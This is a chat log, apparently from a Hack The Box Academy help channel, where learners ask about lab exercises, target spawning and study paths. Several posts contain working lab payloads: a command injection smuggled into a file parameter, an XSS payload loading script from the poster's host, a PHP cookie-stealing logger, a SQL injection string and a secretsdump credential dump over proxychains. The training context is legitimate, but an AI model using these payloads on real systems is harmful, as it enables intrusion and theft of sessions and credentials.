am stuck on web attacks module

section Bypassing Security Filters

Okay so what exactly do you expect from us? It mentions in this section what to do, with the filename given in the question

guys please help me

are you running the tool that you're supposed to proxy with? ie. burp?

bruh the proxychain curl isnt working im getting error

From where to where are you proxying the traffic

Helllo academians :D. I need some minor guidance regarding the last challenge of the File Inclusion module.

I have identify two entry points in the application to find a potential path traversal. I have been Fuzzing these parameters with Jhaddiz path traversal list but I can't seem to find one that can work. For me there is two reasons that this might happen:

1. or I haven't found all entry points in the applcication. But I doubt it because have fuzz all parts of the URL and couldn't find other entries
2. or the Jhaddiz list does not have a path traversal that can work..
   Any hint is welcome.

POST /index.php HTTP/1.1
Host: 94.237.55.105:33586
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://94.237.55.105:33586/index.php
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

file=test%3Bcp+/flag.txt+./

Feel free to dm me to prevent spiolers

url encode it and you should be fine

ok

Just enter this filename in the browser via the get request, and then verb tamper

then check the files again

bro im just a beginner . im totaly confused . Using web proxies - Proxying tools .
Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?
this is the question . I have to use msfconsole . I just tried proxychain .
proxychains curl http://SERVER_IP:PORT
this server_ip: port should be replaced by the ip of web sites ?

even nmap proxy isnt working
nmap --proxies http://127.0.0.1:8080 SERVER_IP -pPORT -Pn -sC

plzz guide me

Do you have Burpsuite Community Edition open?

let me know if you were able to get the flag or need more help 🙂

%74%65%73%74%25%33%42%63%70%2b%2f%66%6c%61%67%2e%74%78%74%2b%2e%2f like this

i used burp encoder

encoded this test%3Bcp+/flag.txt+./

the section provides you with enough information to go through the exercise, you don't need proxychains

I would try the following,

1. copy the filename from the question
2. open the File Manager page in the webbrowser
3. paste the filename in the New File Name text box, press enter
4. Send it to burp repeater
5. burp verb tamper (like mentioned on the page)
6. Send the request
7. refresh your browser

alright . proxychains curl http://SERVER_IP:PORT
so this server_ip : port should be 127.0.0.1:8080 or the target ip

Any help here guys

Carefully go over the question

Take a note of what it says

i guess there is the issue in backed am not getting the request like in example. i can also modify the request but not accepting and showing only 200k with listing notes.txt

Turn intercept off and press enter when submitting

Don’t press the button

[-] 127.0.0.1: Error: Transport endpoint is not connected - getpeername(2)
[-] 127.0.0.1: File doesn't seem to exist. The upload probably failed
[] Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed

i tried every method from last 3 hours but i was just clicking on reset button but it was all about pressing enter

thanks a lot mate. nice to see you 🙂

I am in the Intro to c2 operations with sliver module and was wondering if anyone can explain to me why does the getsystem command not work

Glad I could help

check systeminfo

god bless you❤️

am just 5 modules away

I’ll be back in a bit. Need to run to the store real quick

Sorry, I still dont get it. I also had another question- when I used execute-assembly with godpotato here it failed to create process. But when I used donut to create shellcode and used execute-shellcode it successfully worked. Why did it fail with execute-assembly?

Regarding the optional exercise at the end of the Documentation and Reporting module, where we can submit a draft report for constructive feedback, is that still an offered service by the HTB team? I know they've probably lots of actual exam reports to work through, wouldn't want to add more to their plate

dude don't ping mods here, just wait for support

pinging mods here won't speed it up

wait for support then

Support is the best way to get this resolved

They should be around now

Let me send them a message and see whats up

Patience is a virtue 😇

Frustrating for sure, but lends a good opportunity to try something else or learn something new while waiting. Never a bad thing to expand your knowledge 🙂

Skipping it till you receive support is impossible?

😐

We cant find any tickets from yesterday, last we see was a week ago.

However we do have the recently opened ticket and we'll respond to it shortly.

Are you able to send a screenshot of the ticket you had opened, so we can figure out where it went?

Sorry to hear that but please dopn't oing pings as they usually don't work at HTB

except me and some others

Also, we try our best but can't cover 24hours sadly so please be patient and we can resolve your issue

Best is to DM me the screenshot

anyone having trouble spawning targets?

not at this moment

hmmmm

might just be taking a while if it is a big lab?

its just the beginning fo the Windows Privesc labs

worked pretty well a few hours ago. ill prob just try a different vpn in a minute

I have trouble spawning target

I'm on enterprise academy and just opened a new session

i have trouble in spawning target

well that sucks, but we're suffering together

yahtzee! i'm in

/genesis API call is showing deploying, and after a few calls (I would say its lasting time is shorter than before), it returns 204 without any target IP

I tried multiple time, but it still does NOT work.

sent

hopefully it comes through soon

No issue spawning machines here. Just spawned a new one

yea mine just fixed itself and is working now

it worked that way with windows client

hey guys ! i’m working on RE private API and i’m stuck in reproducing a protobuf encryption somebody already experienced this ?

Anyone know the term "phishing"

yea most of us are familar with it ....

What about osint tools?

Does anyone teach this

there is an OSINT course, but its 1 of the more advanced modules

and there is some OSINT on the Information Gathering module as well

Where?

but i dont believe HTB teaches Maltego or OSINTFRAMEWORK

https://academy.hackthebox.com/module/details/144

Thanks @sterile solstice

https://academy.hackthebox.com/module/details/28

I could not spawn the target does anyone face it?

no problem. I'm looking forward to when I do the OSINT: Corporate Recon module, but its at the highest tier. i can't speak to its contents right now.

It's being spawning for half an hour but still not spawned

my session keeps dropping. it wasn't working for me before

I was just facing it several minutes before. Now I fixed it myself.

Please clean all your browser caches and COOKIES.

then relogin, now it works

far out. i absolutely dread going back to a windows based module. it wont stop dropping. its infuriating.

getting flashbacks to the pivoting module, and pasword attack modules all over again lol

did it finally work? If it spins more than a minute, try refreshing the page.. if it still spins, try changing VPN. Changing VPN forces all spawned/stuck machines to get killed so you can spawn a clean one on the new VPN.

..and yes VPNs are having an impact.. all VMs you spawn, are assigned on the VPN you have selected in /vpn

so far EU5 has treated me well ... but I hope you get an Australian VPN in the future.

module web attacks, Mass IDOR Enumaration.... can someone see what i'm doing wrong here? nothing is returned

Remove your grep

||guys i wanna mention something maybe can be help in the future or maybe i am unerstanding wrong, but in some sections like this one : https://academy.hackthebox.com/module/81/section/962 , says i need to connect to the live host to capture, i understand i need to connect to the target that is generated from the academy, but the the answers are not there, so sometimes is difficult to me understand if i need to go directly to the target or analyse the PCAP, now i solved but is a little bit confuse some times||

alright, let me try

Most likely your grep is removing all the input as it’s not matching

Is there a place to submit minor typo corrections on modules? Maybe in #1234357888114364508 ? Just have been running very minor grammatical things here and there, nothing module breaking

not sure, what to do, i'm litteraly copy paste from the course, i double checked that it is grep the riight expression .. is it not right ?

Sorry I sent a shark to eat the cables

Which kind?

Underwater

Duh

im guessing theres a pun about wireshark in there haha

And underwater shark? 😮

Idk probably, woke up sicker than a dog so brain isn't firing on all cylinders

I’ll check in a few min. Bare with me

Appreciate it, thank you

ah, damn. yea that sucks lol

I am gonna look now, sorry was having lunch real quick

no worries

Hii! You need to find the proper artifacts that may register information related to what you're looking

Okay so in the examples on the page, the target is working via a GET request. For the exercise, and the spawned target, this is not the case. So in this case, the curl command would indeed not work. You can either do it via Burpsuite or alter the bash script

For example, in the case of the document, try to find an artifact that may be related to documents. Fell free to DM if you need further assistance 😄

is there a place i can find SOAPAction payloads ?

besides whats given in the module?

did anyone solve the attacking thick client application reverse engineering i am unable to find the specified file

the reverse engineering restart-oracleservice.exe

that is based on another retired box, I don't remember the name but you can search around

did but could not get any stuff

I already told you to watch fatty

in fatty he explained and i was able to replicate the steps

but that is for the second question i guess the one for finding the eth0 ip

they're talking about a different section

but i am talking about the first question where we have to reverse engineer the restart-oracleservice.exe

Fatty was thick client right

and find the hardcoded credentials

yes for logging into that java with vulnerable sql code

ah the box is PivotAPi

it's Exploiting Web Vulnerabilities in Thick-Client Applications

the previous section is just Attacking Thick Client Applications

Smfh

Whoever made the names too similar

can you come ib once

hello, im doing the Reflected XSS and the flag i have found is saying that its incorrect. Is there anyone who can confirm if my flag is correct?

what

dm

sorry I don't provide module help in dms, and I don't remember much for that section

check the pivotapi box walkthroughs

can anyone check if my flag is wrong? "stored for everyone..."

the flag is the sthandard flag format, HTB{...}

yup

HTB{570r3d} this is how it begins

nope wrong section

oh, yeah, thanks

Module: AD Skill Assessment part 1
Dump LSA & SAM remotely with proxychains doesnt work!? - only locally - any suggestions?

it does tho

If executed nothing happens

have set up chisel on linux and windows machine - seems to work

something is wrong with the pivot or command then, how are you running it

rdp works over proxychains - proxychains python3 secretsdump.py inlanefreight/svc_sql:"......."@172....
`

and what's the output? also why run secretsdump.py with python3? what's wrong with a pip/pipx install

Hello, where can I ask a question to get advice in the learning process?

If this question is related to the academy module, you can ask it here

What would you like to know?

can someone please help me cuz i cant find this file usr/share/dirb/wordlists/common.txt for the web eumeration chapter in getting started

CROSS-SITE SCRIPTING (XSS) Module

Section: Session Hijacking
Try to repeat what you learned in this section to identify the vulnerable input field and find a working XSS payload, and then use the 'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to get the flag.

My command which works and a request is sent to my server:
"><script src=http://10.10.15.114:80/index3.php></script><script>$.getScript("http://10.10.15.114:80/index3.php")</script>

This is the php script for index3.php:

if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "10.149.248.249: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

I get a request message alert but the index3.php is not getting the cookie. Is there anything I'm doing wrong?

Thanks

<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as /Viggers $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "10.149.248.249: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>

hey everyone any suggestions for citrix breakout unable to do the admin part

This is what I used and what the module gave me

https://github.com/v0re/dirb/blob/master/wordlists/common.txt

The fact is that at the moment I am studying the path of Information Security Foundations. Next, I plan to explore the SOC Analyst path. In the process of studying the path Information Security Foundations, in the context I saw the text "which we can learn more about in the Penetration Testing Process module" The question is whether it is worth studying the "Penetration Testing Process" module at the same time? Additional information: I am a former trainee penetration tester, I have basic knowledge of penetration testing.

pipx good hint - machine was broke

@next bronze any suggestions for citrix breakout windows escalation

.

yeah, i just looked for another common.txt somewhere else and used that

try the stuff in the section, run the enum tools once you get user

hello i was learning a Automating Payloads & Delivery with Metasploit on HTB. And then i got this problem. that i can't get the shell but i can ping the victim

hello everyone it it normale not getting any postive req on Broken Authentication Brute-Forcing Password Reset Tokens

If you are familiar with the pentesting process, this module is not absolutely necessary for the SOC path.

i cant send the picture

Thanks, for the answer! +rep

verify your account, read#welcome

But take a look at the SOC Analyst Prerequisites Path

https://academy.hackthebox.com/path/preview/soc-analyst-prerequisites

Sure, after finishing the Information Security Foundations, I'll switch to this.

🙃 if someone can help with this plz

your lhost is incorrect, it should be your vpn ip

how do i get the vpn ip sorry, im very new to this

ip a

or set lhost tun0

What does your list of tokens.txt contain?

0 to 999999

Cuz when i ask for the token i cant get a sample for how the token is generated so i assumed that the token is 6 digits

But if you can't find anything with it, what options do you have?

We have the question befor that says the token is 6 digits

The previous question asks how many possibilities there are with a token with 6 numbers, right?

Yes

So i generated a wordlist based on that

Think about what that means for traffic.

Can a server process so many requests within a short time?

restaring the kali worked

XDD

hello guys, I am having problem while setting up odat for oracle tns enumeration can someone help me through vc?

I have a question. I am working towards the CPTS cert. I finished the Fundamental sections and moving on to the Network Enum with Nnap. From this point to the end. How many cubes are needed to finish the PT path? Thanks. I am asking to know how many to buy.

The CPTS Path?
I would rec. buying a student sub which is 8$/m and it's cheaper then cubes.

anyone having any hints for documenting and reporting section. Really weak in this part

Yea the CPTS path. OK ill check that out, thanks so much

Yea, the CPTS path is 1960 cubes. Np, get the student one and you good to go.

I dont think I can get it

its grayed out for me

Try it with the PwnBox. I have just tried it out. It works perfectly

okay, I'll try!

https://help.hackthebox.com/en/articles/7973133-getting-the-student-subscription

It worked, thnx mate 🙂

thank you

can someone help me with skill assesment in intro to threath hunting and hunting with elastic

when i try to search in elastic
file.path:"C:\\*"

or anything with * regex wont work for some reason

should it work 😢 im stuck as hell on this today

maybe im doing the wrong thing completely..

Advanced xss and csrf exploitation - cors misconfiguration

Somehow my cookie is not being sent with the request. Im logged into vulnerablesite.htb in another tab and can see my cookie there.

Sorry for photo but I dont have discord on my laptop

Your question is about Hunt 1 ?

yess

they say: Create a KQL query to hunt for "Lateral Tool Transfer" to C:\Users\Public.

so have a look there : )

yeah

but the file.path thingy is not working for me :( im trynna look for that pth like that lol

i just query C:\Users\Public without anything else, if i remember correctly

yup!

i guess file.path is not where that info was logged. you can try process.working.directory

sorry guys where can I find the pro lab dante discord chat?

#1263635449335910531

its saya no access

Read and follow #welcome

thanks

<@&861185840277487616> bros spamming in every channel

hi im new here and could use some help getting started

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hey Myk4my. I am also trying to understand this.
Did you figure out a way to bypass the \ filtering?

Module: Password Attacks
Section: Network Services
Currently stuck at accessing the nfs
I mounted the remote nfs as root with
````mount -t nfs 10.129.21.226:/JNFS /mnt/nfs -o nolock```

└─/mnt/nfs                                              10.129.21.226:/JNFS nfs             rw,relatime,vers=3,rsize=32768,wsize=32768,namlen=255,hard,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.129.21.226,mountvers=3,mountport=2049,mountproto=udp,local_lock=all,addr=10.129.21.226

But when I try to access the share:

└──╼ #cd /mnt/nfs
bash: cd: /mnt/nfs: Permission denied

I obtained the root in pwnbox via sudo su, I also tried sudo bash and even su - and su root and ever had I able to access anything from JNFS

can someone point out some stupid mistakes I made here ._.
Thank you for your time.

Hi, all. I'm sorry to bother, but I'm banging my head against a wall with the **Attacking Common Applications- Attacking Thick Client Applications **exercise. On the first step in the material, changing permissions for the Temp folder of the user I RDP in as, I get error messages saying the operation "failed to enumerate objects in the container", and the .bat file never shows up. If anyone had a moment, I'd greatly appreciate a little nudge regarding what I'm missing!

anyone can give some suggestions for documenting and reporting. I am unable to accomplish the given task

Hunt 2: Create a KQL query to hunt for "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder". Enter the content of the registry.value field in the document that is related to the first registry-based persistence action as your answer.

i found using event id 13 two hits

but none of their registry.values are good (the values are the same)

can someone explain something to me

why was the sqli in the api attack section worked "it needed 'OR 1=1' OR 1 statement, why did that drop the table i dont get it

can you approach in dm once please, thanks

anyone who has done the documenting and reporting htb module, kindly just tag me please